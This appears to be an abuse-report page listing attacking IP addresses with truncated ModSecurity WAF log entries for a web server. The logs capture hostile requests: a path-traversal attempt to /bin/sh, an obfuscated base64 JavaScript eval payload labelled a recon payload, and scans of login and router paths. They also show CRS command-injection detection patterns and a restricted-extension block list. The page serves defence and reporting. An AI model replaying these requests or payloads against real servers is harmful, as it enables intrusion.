|
π¨π¦
85.217.149.30
|
|
[Sun Sep 06 15:48:25.636890 2026] [security2:error] [pid 1184226:tid 1184226] [client 85.217.149.30: ...
show more
[Sun Sep 06 15:48:25.636890 2026] [security2:error] [pid 1184226:tid 1184226] [client 85.217.149.30:36196] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/"] [unique_id "ap3fqXMV4SQXlljYba-GjwAAAAw"]
[Sun Sep 06 15:48:25.812917 2026] [security2:error] [pid 1184226:tid 1184226] [client 85.217.149.30:36196] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "9801
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π±πΉ
77.90.185.230
|
|
[Sun Sep 06 15:37:14.913639 2026] [security2:error] [pid 1184264:tid 1184264] [client 77.90.185.230: ...
show more
[Sun Sep 06 15:37:14.913639 2026] [security2:error] [pid 1184264:tid 1184264] [client 77.90.185.230:42837] ModSecurity: Warning. String match within ".ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/" at TX:extension. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1146"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".save"] [severit
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΈπ¬
104.28.254.46
|
|
[Sun Sep 06 15:33:59.627206 2026] [security2:error] [pid 1140012:tid 1140012] [client 104.28.254.46: ...
show more
[Sun Sep 06 15:33:59.627206 2026] [security2:error] [pid 1140012:tid 1140012] [client 104.28.254.46:24899] ModSecurity: Warning. String match within ".ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/" at TX:extension. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1146"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".save"] [severit
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
34.207.86.197
|
|
[Sun Sep 06 15:09:51.659691 2026] [security2:error] [pid 1140012:tid 1140012] [client 34.207.86.197: ...
show more
[Sun Sep 06 15:09:51.659691 2026] [security2:error] [pid 1140012:tid 1140012] [client 34.207.86.197:20166] ModSecurity: Warning. Pattern match "(?i)(?:b[\\"'\\\\)\\\\[\\\\x5c]*(?:(?:(?:\\\\|\\\\||&&)[\\\\s\\\\x0b]*)?\\\\$[!#\\\\(\\\\*\\\\-0-9\\\\?@_a-\\\\{]*)?\\\\x5c?u[\\"'\\\\)\\\\[\\\\x5c]*(?:(?:(?:\\\\|\\\\||&&)[\\\\s\\\\x0b]*)?\\\\$[!#\\\\(\\\\*\\\\-0-9\\\\?@_a-\\\\{]*)?\\\\x5c?s[\\"'\\\\)\\\\[\\\\x5c]*(?:(?:(?:\\\\|\\\\||&&)[\\\\s\\\\x0b]*)?\\\\$[!#\\\\(\\\\*\\\\-0-9\\ ..." at ARGS:0. [file "/etc/modsecurity/crs/current/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "205"] [id "932235"] [msg "Remote Command Execution: Unix Command Injection (command without evasion)"] [data "Matched Data: eval)(global[[\\x5c\\x22Bu\\x5c\\x22,\\x5c\\x22ffe\\x5c\\x22,\\x5c\\x22r\\x5c\\x22].join(\\x5c\\x22\\x5c\\x22)].from('KGFzeW5jIGZ1bmN0aW9uKCl7Ci8vIGZhc3RfcmVjb25fdjYg4oCUIHNpZ25hdHVyZS1yb3RhdGVkIHJlY29uIHBheWxvYWQKLy8gQ2hhbmdlcyBmcm9tIHY1OgovLyAgIC0gUmFuZG9taXplZCB0b3AtbGV2ZWwgSlNPTiBrZXlz
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
71.6.134.230
|
|
[Sun Sep 06 15:07:40.017663 2026] [security2:error] [pid 1140541:tid 1140541] [client 71.6.134.230:4 ...
show more
[Sun Sep 06 15:07:40.017663 2026] [security2:error] [pid 1140541:tid 1140541] [client 71.6.134.230:41824] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/"] [unique_id "ap3WHBh2NthHdCmCb5GwmwAAAAM"]
[Sun Sep 06 15:07:40.193489 2026] [security2:error] [pid 1140541:tid 1140541] [client 71.6.134.230:41824] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
69.5.169.171
|
|
[Sun Sep 06 15:06:00.716612 2026] [security2:error] [pid 1170755:tid 1170755] [client 69.5.169.171:7 ...
show more
[Sun Sep 06 15:06:00.716612 2026] [security2:error] [pid 1170755:tid 1170755] [client 69.5.169.171:7164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VuB4MHO0XLHSJvgXNFwAAAAo"]
[Sun Sep 06 15:06:00.718162 2026] [security2:error] [pid 1170755:tid 1170755] [client 69.5.169.171:7164] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0-0,
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
194.88.98.121
|
|
[Sun Sep 06 15:06:00.378081 2026] [security2:error] [pid 1139965:tid 1139965] [client 194.88.98.121: ...
show more
[Sun Sep 06 15:06:00.378081 2026] [security2:error] [pid 1139965:tid 1139965] [client 194.88.98.121:11202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VuCPhu9bEueBBc-fQuwAAAAc"]
[Sun Sep 06 15:06:00.379711 2026] [security2:error] [pid 1139965:tid 1139965] [client 194.88.98.121:11202] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
193.124.20.236
|
|
[Sun Sep 06 15:06:00.376611 2026] [security2:error] [pid 1140541:tid 1140541] [client 193.124.20.236 ...
show more
[Sun Sep 06 15:06:00.376611 2026] [security2:error] [pid 1140541:tid 1140541] [client 193.124.20.236:12722] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VuBh2NthHdCmCb5GwmAAAAAM"]
[Sun Sep 06 15:06:00.378034 2026] [security2:error] [pid 1140541:tid 1140541] [client 193.124.20.236:12722] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
69.5.169.203
|
|
[Sun Sep 06 15:06:00.369761 2026] [security2:error] [pid 1140012:tid 1140012] [client 69.5.169.203:9 ...
show more
[Sun Sep 06 15:06:00.369761 2026] [security2:error] [pid 1140012:tid 1140012] [client 69.5.169.203:9552] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VuD88EPM8wAalXEX5ggAAAAA"]
[Sun Sep 06 15:06:00.371816 2026] [security2:error] [pid 1140012:tid 1140012] [client 69.5.169.203:9552] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0-0,
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
193.124.20.234
|
|
[Sun Sep 06 15:06:00.368490 2026] [security2:error] [pid 1052624:tid 1052624] [client 193.124.20.234 ...
show more
[Sun Sep 06 15:06:00.368490 2026] [security2:error] [pid 1052624:tid 1052624] [client 193.124.20.234:3772] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VuIZKDA5xKmCJsZtMXwAAAAU"]
[Sun Sep 06 15:06:00.370020 2026] [security2:error] [pid 1052624:tid 1052624] [client 193.124.20.234:3772] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
69.5.169.159
|
|
[Sun Sep 06 15:06:00.034002 2026] [security2:error] [pid 1170751:tid 1170751] [client 69.5.169.159:1 ...
show more
[Sun Sep 06 15:06:00.034002 2026] [security2:error] [pid 1170751:tid 1170751] [client 69.5.169.159:15830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VuLB0AjVEHpjiT5XFIQAAAAI"]
[Sun Sep 06 15:06:00.035045 2026] [security2:error] [pid 1170751:tid 1170751] [client 69.5.169.159:15830] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0-0
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
69.5.169.157
|
|
[Sun Sep 06 15:05:59.700490 2026] [security2:error] [pid 1165945:tid 1165945] [client 69.5.169.157:5 ...
show more
[Sun Sep 06 15:05:59.700490 2026] [security2:error] [pid 1165945:tid 1165945] [client 69.5.169.157:5604] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3VtzUnXoQqKlctfitK3QAAAAk"]
[Sun Sep 06 15:05:59.702728 2026] [security2:error] [pid 1165945:tid 1165945] [client 69.5.169.157:5604] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0-0,
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π©πͺ
194.88.98.123
|
|
[Sun Sep 06 15:05:59.364517 2026] [security2:error] [pid 1140758:tid 1140758] [client 194.88.98.123: ...
show more
[Sun Sep 06 15:05:59.364517 2026] [security2:error] [pid 1140758:tid 1140758] [client 194.88.98.123:6172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap3Vt5snAR6eZDaHaHRHUwAAAAE"]
[Sun Sep 06 15:05:59.365986 2026] [security2:error] [pid 1140758:tid 1140758] [client 194.88.98.123:6172] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0-0
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π¨π³
162.14.109.170
|
|
[Sun Sep 06 15:02:53.784703 2026] [security2:error] [pid 1165945:tid 1165945] [client 162.14.109.170 ...
show more
[Sun Sep 06 15:02:53.784703 2026] [security2:error] [pid 1165945:tid 1165945] [client 162.14.109.170:57220] ModSecurity: Warning. Pattern match "\\\\b(?:keep-alive|close),\\\\s?(?:keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "402"] [id "920210"] [msg "Multiple/Conflicting Connection Header Data Found"] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "robertomurillo.net"] [uri "/"] [unique_id "ap3U_TUnXoQqKlctfitK1wAAAAk"]
[Sun Sep 06 15:02:53.786647 2026] [security2:error] [pid 1165945:tid 1165945] [client 162.14.109.170:57220] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
40.124.114.203
|
|
[Sun Sep 06 13:12:10.034956 2026] [security2:error] [pid 1139965:tid 1139965] [client 40.124.114.203 ...
show more
[Sun Sep 06 13:12:10.034956 2026] [security2:error] [pid 1139965:tid 1139965] [client 40.124.114.203:59698] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/crs/current/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "56"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: Mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/SCANNER-DETECTION"] [tag "capec/1000/118/224/541/310"] [hostname "186.32.240.17"] [uri "/owa/auth/logon.aspx"] [unique_id "ap27CiPhu9bEueBBc-fQaQAAAAc"]
[Sun Sep 06 13:12:10.035166 2026] [security2:error] [pid 1139965:tid 1139965] [client 40.124.114.203:59698] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π»π³
103.78.2.252
|
|
[Sun Sep 06 13:06:20.827308 2026] [security2:error] [pid 1052624:tid 1052624] [client 103.78.2.252:4 ...
show more
[Sun Sep 06 13:06:20.827308 2026] [security2:error] [pid 1052624:tid 1052624] [client 103.78.2.252:46918] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17:80"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"] [unique_id "ap25rIZKDA5xKmCJsZtMBQAAAAU"]
[Sun Sep 06 13:06:20.827445 2026] [security2:error] [pid 1052624:tid 1052624] [client 103.78.2.252:46918] ModSecurity: Warning. Match of "within %{tx.allowed_request_content_type}" against "TX
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π§πͺ
34.76.237.68
|
|
[Sun Sep 06 13:05:18.448959 2026] [security2:error] [pid 1076953:tid 1076953] [client 34.76.237.68:4 ...
show more
[Sun Sep 06 13:05:18.448959 2026] [security2:error] [pid 1076953:tid 1076953] [client 34.76.237.68:42732] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/"] [unique_id "ap25bscWcZju1Qj2WZUaUQAAAAY"]
[Sun Sep 06 13:05:18.450871 2026] [security2:error] [pid 1076953:tid 1076953] [client 34.76.237.68:42732] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΈπ¬
104.64.208.20
|
|
[Sun Sep 06 13:04:20.592367 2026] [security2:error] [pid 1139964:tid 1139964] [client 104.64.208.20: ...
show more
[Sun Sep 06 13:04:20.592367 2026] [security2:error] [pid 1139964:tid 1139964] [client 104.64.208.20:43386] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17:80"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/"] [unique_id "ap25NBz7fwU1P2EiAe6YhAAAAAQ"]
[Sun Sep 06 13:04:20.594607 2026] [security2:error] [pid 1139964:tid 1139964] [client 104.64.208.20:43386] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "9
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΈπ¬
47.128.96.175
|
|
47.128.96.175 - - [06/Sep/2026:12:44:23 -0600] "GET /robots.txt HTTP/1.1" 403 5566 "-" "-"
...
|
Bad Web Bot
|
|
π°π·
221.159.119.6
|
|
[Sun Sep 06 12:31:02.940898 2026] [security2:error] [pid 1140012:tid 1140012] [client 221.159.119.6: ...
show more
[Sun Sep 06 12:31:02.940898 2026] [security2:error] [pid 1140012:tid 1140012] [client 221.159.119.6:46388] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17:80"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ap2xZj88EPM8wAalXEX5AgAAAAA"]
[Sun Sep 06 12:31:02.942754 2026] [security2:error] [pid 1140012:tid 1140012] [client 221.159.119.6:46388] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
170.106.35.153
|
|
[Sun Sep 06 12:20:27.893663 2026] [security2:error] [pid 1140764:tid 1140764] [client 170.106.35.153 ...
show more
[Sun Sep 06 12:20:27.893663 2026] [security2:error] [pid 1140764:tid 1140764] [client 170.106.35.153:50528] ModSecurity: Warning. Pattern match "\\\\b(?:keep-alive|close),\\\\s?(?:keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "402"] [id "920210"] [msg "Multiple/Conflicting Connection Header Data Found"] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/"] [unique_id "ap2u6_TccKVa62or_UfvNwAAAAk"]
[Sun Sep 06 12:20:27.893763 2026] [security2:error] [pid 1140764:tid 1140764] [client 170.106.35.153:50528] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [fil
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
107.155.48.46
|
|
[Sun Sep 06 11:49:38.194832 2026] [security2:error] [pid 1123738:tid 1123738] [client 107.155.48.46: ...
show more
